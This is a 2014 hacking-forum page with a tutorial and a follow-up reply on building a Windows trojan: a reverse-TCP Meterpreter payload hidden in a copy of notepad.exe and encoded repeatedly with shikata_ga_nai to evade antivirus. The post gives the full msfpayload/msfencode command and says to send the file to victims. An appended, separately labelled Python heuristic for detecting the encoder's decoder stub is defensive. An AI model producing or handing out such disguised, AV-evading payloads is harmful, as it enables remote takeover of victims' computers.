Messages - swartz

1
Hacking and Security / Re: msfencode and payload creation
« on: November 24, 2014, 06:08:54 pm »
I have encoded my payload with various encodings like you mentioned, but my payload was detected by AV... So I researched and found that it's best to write your own shell in the most unique way; I think I read it on this forum!
Long Live Evilzone!!

Anyway any solution to avoid writing your own shell to avoid detection?


Hi mate, if after encoding your payload is still detected by AVs, try to remove the bad characters and generate some NOP shellcode as I say in my tut. Don't know why it doesn't work for you the simple way, it really works for me, but if you want, have a look at this video https://www.youtube.com/watch?v=0RkNm7Rdhg0 which was made by me for another member who faced the same problem. Hope that helps!!

2
Hacking and Security / msfencode and payload creation
« on: November 23, 2014, 07:07:55 pm »

Hi everyone, in my first post I will show you how to create a reverse meterpreter payload from a "clear" Windows exe file, and then
we will encode it to avoid most AVs. I will use shikata_ga_nai as the encoder, but you can use more than one encoder for a better result,
and you can even remove all the bad chars and generate some NOP shellcode for a more advanced result.


To see all the msfencode encoders you can use the msfencode -l command.
In this tutorial I will use notepad.exe from Windows.


Before we start, I will list all the options that will be used, for the people who don't know what each option is.
-e = selection of encoder
-c = how many times we will encode our payload
-t = file format
-x = the executable file that we want to encode
-o = save the new file


First copy notepad.exe and paste it on your Kali desktop.
Ok, now we open our terminal and use this code:
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=XXXX R | msfencode -e x86/shikata_ga_nai -c 30 -t exe -x /root/Desktop/notepad.exe -o /root/Desktop/notepad2.exe

and hit enter... wait until it creates the payload and encodes it 30 times as we
specified. If everything went right you will see a notepad2.exe file on your desktop; that's our payload. So now we can send our payload
to the victim or upload it for more victims.
You have to use the multi/handler exploit, and don't forget to use the same options as the payload (LPORT etc).
After uploading it to an online scanner such as virus_total the result was 6/54, good enough for me :)


Note: sometimes if you use 2 encoders it may break the payload and you will never get the session.
In the same way you can encode every payload.
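
From the detection side, as an added example that is not part of the original post: however many passes -c requests, the output of x86/shikata_ga_nai still begins with a decoder stub that has to remain executable, and its GetPC step (fnstenv [esp-0xc] followed by a pop) is a stable byte pattern. The Python heuristic below flags it; the function name, the 16-byte window and the sample buffers are assumptions constructed for illustration.

```python
import re

# fnstenv [esp-0xc]: the GetPC instruction at the core of the decoder stub.
FNSTENV = b"\xd9\x74\x24\xf4"
POP_REG = re.compile(rb"[\x58-\x5b\x5d-\x5f]")            # pop eax..edi (not esp)
CLEAR_ECX = re.compile(rb"[\x29\x2b\x31\x33]\xc9")        # sub/xor ecx, ecx
SET_COUNT = re.compile(rb"\xb1.|\x66\xb9..", re.DOTALL)   # mov cl, imm8 / mov cx, imm16
WINDOW = 16  # assumed search radius around fnstenv, in bytes


def find_sgn_stubs(data: bytes) -> list[int]:
    """Return offsets of fnstenv instructions that look like part of a decoder stub.

    The stub's instructions are reordered per build, so apart from the pop
    (which must follow fnstenv) the companions are searched on both sides.
    The trailing loop instruction is not required because the stub encodes it.
    """
    hits = []
    pos = data.find(FNSTENV)
    while pos != -1:
        end = pos + len(FNSTENV)
        before = data[max(0, pos - WINDOW):pos]
        after = data[end:end + WINDOW]
        around = before + after
        if (POP_REG.search(after)
                and CLEAR_ECX.search(around)
                and SET_COUNT.search(around)):
            hits.append(pos)
        pos = data.find(FNSTENV, pos + 1)
    return hits


# Constructed sample: 64 bytes of padding, then only the head of a stub
# (mov ebx, key; FPU op; fnstenv; pop esi; xor ecx, ecx; mov cl, 0x47).
# It is not a working payload.
STUB_HEAD = (b"\xbb\x11\x22\x33\x44" b"\xda\xc4" b"\xd9\x74\x24\xf4"
             b"\x5e" b"\x31\xc9" b"\xb1\x47")
SAMPLE = b"MZ" + b"\x00" * 62 + STUB_HEAD + b"\x00" * 16
# Constructed negative case: a lone fnstenv with none of its companions.
LONE_FNSTENV = b"\x00" * 32 + FNSTENV + b"\x00" * 32

if __name__ == "__main__":
    print("stub offsets in sample:", find_sgn_stubs(SAMPLE))
    print("stub offsets in negative case:", find_sgn_stubs(LONE_FNSTENV))
```

A hit is a lead for triage rather than a verdict, since short byte patterns can also occur in benign data.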
